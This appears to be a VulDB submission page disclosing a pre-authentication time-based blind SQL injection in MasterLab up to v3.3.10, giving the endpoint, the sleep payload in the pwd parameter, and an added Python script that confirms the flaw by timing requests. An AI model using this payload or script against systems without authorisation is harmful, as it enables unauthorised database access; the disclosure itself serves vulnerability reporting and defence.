Submit #258782: gopeak MasterLab ≤v3.3.10 Pre-Auth SQL Injection

Title: gopeak MasterLab ≤v3.3.10 Pre-Auth SQL Injection
Description: MasterLab is a project management tool that offers task management, issue tracking, and team collaboration through its web platform. A pre-authentication SQL injection vulnerability exists in MasterLab version 3.3.10 and below, in the sqlInject function of the app/ctrl/framework/Feature.php file. The function fails to sanitize or escape the user-supplied pwd parameter before using it in a database query, so an attacker can inject arbitrary SQL and manipulate the database. The function appears to be test code that the developers wrote and then forgot to remove.

An attacker exploits the flaw by sending a crafted HTTP POST request to the /framework/feature/sqlInject endpoint with SQL in the pwd parameter, for example pwd=1' or sleep(5)='1. The database executes the sleep function and the HTTP response is delayed by 5 seconds; a reproducible delay of that length confirms that the injected expression reached the database (a time-based blind SQL injection). No authentication is required, which is why the issue is classified as a pre-authentication SQL injection.

Because an unauthenticated attacker can execute arbitrary SQL statements, the vulnerability can lead to sensitive data exposure, data tampering, or full database compromise, and it is considered a critical issue that requires immediate attention. Users of MasterLab v3.3.10 and below are advised to upgrade to the latest version as soon as possible.
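The following script reproduces the time-based check described above in a way that does not mistake network jitter for a successful injection. It is an added example written for this page, not the submitter's proof of concept and not MasterLab code. It assumes a target base URL supplied on the command line, a MySQL/MariaDB backend (where sleep() exists, as the submission's payload implies), the standard-library urllib client, three samples per measurement, and an 80%-of-sleep threshold; none of those choices come from the submission. It sends a benign pwd value first to establish a baseline, then the sleep payload, and only reports the injection when every injected request is delayed by most of the requested sleep relative to the baseline median.

```python
"""Time-based confirmation check for the MasterLab sqlInject endpoint.

Added example for this page; not part of the VulDB submission or of MasterLab.
Assumed (not stated in the submission): the base URL, urllib as HTTP client,
the sample count, and the 0.8 * sleep threshold used to judge a real delay.
"""
import statistics
import time
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, List, Optional

# Endpoint and payload shape are taken from the submission text.
ENDPOINT = "/framework/feature/sqlInject"


def sleep_payload(seconds: int) -> str:
    """Build the payload quoted in the submission: 1' or sleep(N)='1."""
    return f"1' or sleep({seconds})='1"


def encode_form(pwd: str) -> bytes:
    """Form-encode the pwd parameter.

    The quote, spaces, parentheses and '=' in the payload must be encoded;
    sending the string raw in the body would not reproduce the check.
    """
    return urllib.parse.urlencode({"pwd": pwd}).encode()


def http_post(base_url: str, body: bytes, timeout: float) -> float:
    """POST the body to the endpoint and return elapsed seconds.

    A 4xx/5xx status is still a timed answer (the query ran before the error
    page was produced).  A socket timeout surfaces as urllib.error.URLError
    and is deliberately left to propagate so that a dead host is not
    reported as a 'delayed' one.
    """
    req = urllib.request.Request(
        base_url.rstrip("/") + ENDPOINT,
        data=body,
        method="POST",
        headers={"Content-Type": "application/x-www-form-urlencoded"},
    )
    start = time.monotonic()
    try:
        with urllib.request.urlopen(req, timeout=timeout):
            pass
    except urllib.error.HTTPError:
        pass
    return time.monotonic() - start


def timed_samples(send: Callable[[bytes], float], pwd: str, n: int) -> List[float]:
    """Send the same pwd value n times and collect the elapsed times."""
    body = encode_form(pwd)
    return [send(body) for _ in range(n)]


def delay_confirmed(baseline: List[float], injected: List[float], seconds: int) -> bool:
    """Decide whether the injected requests were delayed by roughly `seconds`.

    The baseline median absorbs a single slow benign request; requiring the
    *slowest-to-fastest* gap (min of injected minus baseline median) to exceed
    80% of the sleep means every injected request must have paused, so one
    stalled request cannot produce a false positive.
    """
    gap = min(injected) - statistics.median(baseline)
    return gap >= 0.8 * seconds


def check_target(
    base_url: str,
    seconds: int = 5,
    samples: int = 3,
    send: Optional[Callable[[bytes], float]] = None,
) -> bool:
    """Return True if the sleep payload reproducibly delays the response.

    `send` is injectable so the decision logic can be exercised without a
    live host; by default it performs real HTTP POSTs against base_url.
    """
    if send is None:
        # Timeout well above the sleep so a genuine delay is measured, not cut off.
        send = lambda body: http_post(base_url, body, timeout=seconds * 3)
    baseline = timed_samples(send, "1", samples)          # benign value
    injected = timed_samples(send, sleep_payload(seconds), samples)
    return delay_confirmed(baseline, injected, seconds)


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "http://masterlab.example"  # assumed URL
    print("vulnerable" if check_target(target) else "no measurable delay")
```

Run it only against an instance you are authorised to test; the check makes six requests and, on a vulnerable host, takes roughly 15 seconds because each injected request sleeps for five.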
Source: https://note.zhaoj.in/share/4HDWrBHGCf9e
User: glzjin (UID 59815)
Submission: 12/27/2023 10:39
Moderation: 12/28/2023 09:33 (23 hours later)
Status: Accepted
VulDB entry: 249147 [gopeak MasterLab up to 3.3.10 HTTP POST Request Feature.php sqlInject pwd sql injection]
Points: 20
